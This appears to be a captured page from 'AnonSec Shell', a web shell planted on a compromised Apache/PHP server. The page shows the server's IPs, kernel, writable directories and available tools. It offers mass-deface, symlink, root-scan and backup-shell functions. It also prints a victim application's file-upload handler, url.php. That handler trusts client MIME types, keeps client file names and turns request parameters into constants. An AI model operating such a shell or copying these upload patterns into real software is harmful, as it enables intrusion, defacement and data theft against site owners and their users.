. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . AnonSec Shell
AnonSec Shell
Server IP : 52.223.31.75  /  Your IP : 172.31.32.98   [ Reverse IP ]
Web Server : Apache/2.4.66 () OpenSSL/1.0.2k-fips PHP/7.4.33
System : Linux ip-172-31-14-81.eu-central-1.compute.internal 4.14.281-212.502.amzn2.x86_64 #1 SMP Thu May 26 09:52:17 UTC 2022 x86_64
User : apache ( 48)
PHP Version : 7.4.33
Disable Function : NONE
Domains : 4 Domains
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/sapere/app/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /var/www/sapere/app/url.php
<?php

// var_dump($_FILES);
// die;
if (isset($_SERVER["CONTENT_LENGTH"])) {
    if ($_SERVER["CONTENT_LENGTH"] > ((int)ini_get('post_max_size') * 1024 * 1024) || $_SERVER["CONTENT_LENGTH"] > ((int)ini_get('upload_max_filesize') * 1024 * 1024)) {
		header('Content-Type: application/json');
		$data = array(
				"message" => "I files caricati superano la dimensione massima di upload del singolo file di ".ini_get('upload_max_filesize')." o quella supportata dal sistema ".ini_get('post_max_size').". Prova a caricare un numero minore di file, puoi caricare al massimo ".ini_get('max_file_uploads')." files, nessun file caricato!",
				"status" => false
			);
		print( json_encode($data) );

		die();
        
    }
}


$jsonRequest = getallheaders();

if ( array_key_exists('Content-Type', $jsonRequest) ) {
	$jsonRequest = strtolower(preg_replace('/\s+/', '', $jsonRequest["Content-Type"]));	
}



if($jsonRequest == "application/json"){
	
	$json = json_decode(file_get_contents('php://input', true));
	$objs = (get_object_vars( $json ));
	$files = array();

	foreach($objs as $params=>$data) {

		if($params === "files") {
			list($type, $data) = explode(';', $data);
			list(, $data) = explode(',', $data);
			$data = base64_decode($data);
			
			if( preg_match("/jpeg/i", $type) ) {
				//add timestamp befor named of file image for preserve integrity
				$uploaddir = SITEROOT_DIR.'/www/api/tmp/'. time() . '_' .'temp.jpg';
			} else if ( preg_match("/png/i", $type) ) {
				$uploaddir = SITEROOT_DIR.'/www/api/tmp/'. time() . '_' .'temp.png';
			} else if ( preg_match("/gif/i", $type) ) {
				$uploaddir = SITEROOT_DIR.'/www/api/tmp/'. time() . '_' .'temp.gif';
			}
			//csv
			else if(preg_match("/csv/i", $type)){
				$uploaddir = SITEROOT_DIR.'/www/api/tmp/file.csv';
			}  
			/* videos
			else if(preg_match("/flash/i", $type)){
				$uploaddir = SITEROOT_DIR.'/www/api/tmp/video.flv';
			}  
			else if(preg_match("/quicktime/i", $type)){
				$uploaddir = SITEROOT_DIR.'/www/api/tmp/video.mov';
			}
			else if(preg_match("/avi/i", $type)){
				$uploaddir = SITEROOT_DIR.'/www/api/tmp/video.avi';
			}       
			else if(preg_match("/mpeg/i", $type)){
				$uploaddir = SITEROOT_DIR.'/www/api/tmp/video.mp4';
			} 
			else if(preg_match("/mp4/i", $type)){
				$uploaddir = SITEROOT_DIR.'/www/api/tmp/video.mp4';
			}                      
			else if(preg_match("/asf/i", $type)){
				$uploaddir = SITEROOT_DIR.'/www/api/tmp/video.wmv';
			}                                              
			else if(preg_match("/flc/i", $type)){
				$uploaddir = SITEROOT_DIR.'/www/api/tmp/video.flc';
			}                           
			else if(preg_match("/ogg/i", $type)){
				$uploaddir = SITEROOT_DIR.'/www/api/tmp/video.ogg';
			}                 
			else if(preg_match("/asf/i", $type)){
				$uploaddir = SITEROOT_DIR.'/www/api/tmp/video.wmv';
			}*/
			else if(preg_match("/pdf/i", $type)){
				$uploaddir = SITEROOT_DIR.'/www/api/tmp/'.time().'-pdf.pdf';
			}
			else if(preg_match("/txt/i", $type)){
				$uploaddir = SITEROOT_DIR.'/www/api/tmp/'.time().'-txt.txt';
			} 
			else if(preg_match("/doc/i", $type)){
				$uploaddir = SITEROOT_DIR.'/www/api/tmp/'.time().'-doc.doc';
			}
			else if(preg_match("/docx/i", $type)){
				$uploaddir = SITEROOT_DIR.'/www/api/tmp/'.time().'-docx.docx';
			}
			else if(preg_match("/xls/i", $type)){
				$uploaddir = SITEROOT_DIR.'/www/api/tmp/'.time().'-xls.xls';
			}     
			else if(preg_match("/xlsx/i", $type)){
				$uploaddir = SITEROOT_DIR.'/www/api/tmp/'.time().'-xlsx.xlsx';
			}

			if($uploaddir){
				file_put_contents($uploaddir, $data);
			}else{
				$uploaddir = -1;
			}     

			
			$files[] = $uploaddir;

		} 

		
		
		if($params != "files"){
			$key = strtoupper( $params );
			$value = $data;

			//echo $key."<-->".$value;

			if(is_array($value)){
				define($key, serialize($value));
			}else{
				//if(count($value)){
					//if($value=!$key){
						define($key, $value);
					//}else{
					//	define($key, "");
					//}
				//}else{
				//	define($key, "");
				//}
			}	
		}

	
	
	}
	
	
} else if($_SERVER['QUERY_STRING']){
	


	$params = explode("&", $_SERVER['QUERY_STRING']);

	//disabilitato per ora
	// if($_FILES) {
	// 	$error = false;
	// 	$files = array();
	// 	$uploaddir = SITEROOT_DIR.'/www/api/tmp/';

	// 	foreach($_FILES as $file) {
	// 		if(move_uploaded_file($file['tmp_name'], $uploaddir .basename($file['name']))){
	// 			$files[] = $uploaddir .$file['name'];
	// 		} else {
	// 			header('Content-Type: application/json');
	// 			$data = array(
	// 					"message" => "File non caricato! Probilmente il file è troppo grande, i limite è ".ini_get('upload_max_filesize')."! ". $uploaddir,
	// 					"status" => false
	// 				);
	// 			print( json_encode($data) );
	// 			die();
	// 		}
	// 	}

	// }

	foreach($params as $param) {
	//	$param = strtolower($param);
		
		$tmparrparam=explode("=", $param);
		$value = end($tmparrparam );

		$retmparr = explode("=", strtoupper( $param ) );
		$key = reset($retmparr );
	
		define($key, $value);
	}
	
} else if($_POST) {
	if($_FILES) {	
		$error = false;
		$files = array();
		$uploaddir = SITEROOT_DIR.'/uploads/';
		$file = $_FILES['files'];
		if((int)ini_get('max_file_uploads') < count($file['name'])) {
			header('Content-Type: application/json');
			$data = array(
					"message" => "Il numero massimo di file caricabili: ".ini_get('max_file_uploads').". Prova a caricare un numero minore di file in comtemporanea, nessun file caricato!",
					"status" => false
				);
			print( json_encode($data) );
			die();
		}

		$totale_files_size = 0;
		for ($i=0; $i < count($file['size']); $i++) {
			if($file['size'][$i] > ((int)ini_get('post_max_size') * 1024 * 1024) || $file['size'][$i] > ((int)ini_get('upload_max_filesize') * 1024 * 1024)) {
				header('Content-Type: application/json');
				$data = array(
						"message" => "Il file ". $file['name'][$i] ." supera la dimensione massima di upload del singolo file di ".ini_get('upload_max_filesize').". Nessun file caricato!",
						"status" => false
					);
				print( json_encode($data) );
				die();
			}
			$totale_files_size += $file['size'][$i];
		
			//controllo il tipo di file se è un immagine, video, audio, pdf, doc, docx, xls, xlsx o zip allora lo carico
			if(!preg_match("/jpeg|png|gif|mp4|mp4a|mp4s|mp4v|mov|mwm|mkv|webm|avi|mpeg|mp3|pdf|doc|docx|zip|xls|xlsx/i", $file['type'][$i]) ){
				header('Content-Type: application/json');
				$data = array(
						"message" => "File ". $file['name'][$i] ." non supportato! Nessun file caricato!",
						"status" => false
					);
				print( json_encode($data) );
				die();
			}
		}
		if($totale_files_size > ((int)ini_get('post_max_size') * 1024 * 1024)) {
			header('Content-Type: application/json');
			$data = array(
					"message" => "La somma della dimensione dei tuoi file supera quella supportata dal sistema ".ini_get('post_max_size').". Prova a caricare un numero minore di file in comtemporanea, nessun file caricato!",
					"status" => false
				);
			print( json_encode($data) );
	
			die();
		}
		
		$error_files = array();
		for ($i=0; $i < count($file['name']); $i++) { 
			if(move_uploaded_file($file['tmp_name'][$i], $uploaddir .basename($file['name'][$i]))){
				$files[] = $uploaddir .$file['name'][$i];
			} else {
				$error_files[] = $file['name'][$i];
			}
		}
		if(count($error_files) > 0){
			header('Content-Type: application/json');
			$data = array(
					"message" => "I seguenti file non sono stati caricati: ". implode(", ", $error_files),
					"status" => false
				);
			print( json_encode($data) );
			die();
		}	
	}
	
	define("FILES", $files);

	$params = $_POST;
	foreach($params as $k=>$v) {
		$key = strtoupper($k);
		$value = $v;
		define($key, $value);
	}
		
} else {
	
	header('Content-Type: application/json');
	$data = array(
			"message" => "Nessun Parametro Inviato!",
			"status" => false
		);
	print( json_encode($data) );

	die();
}


?>

Anon7 - 2022
AnonSec Team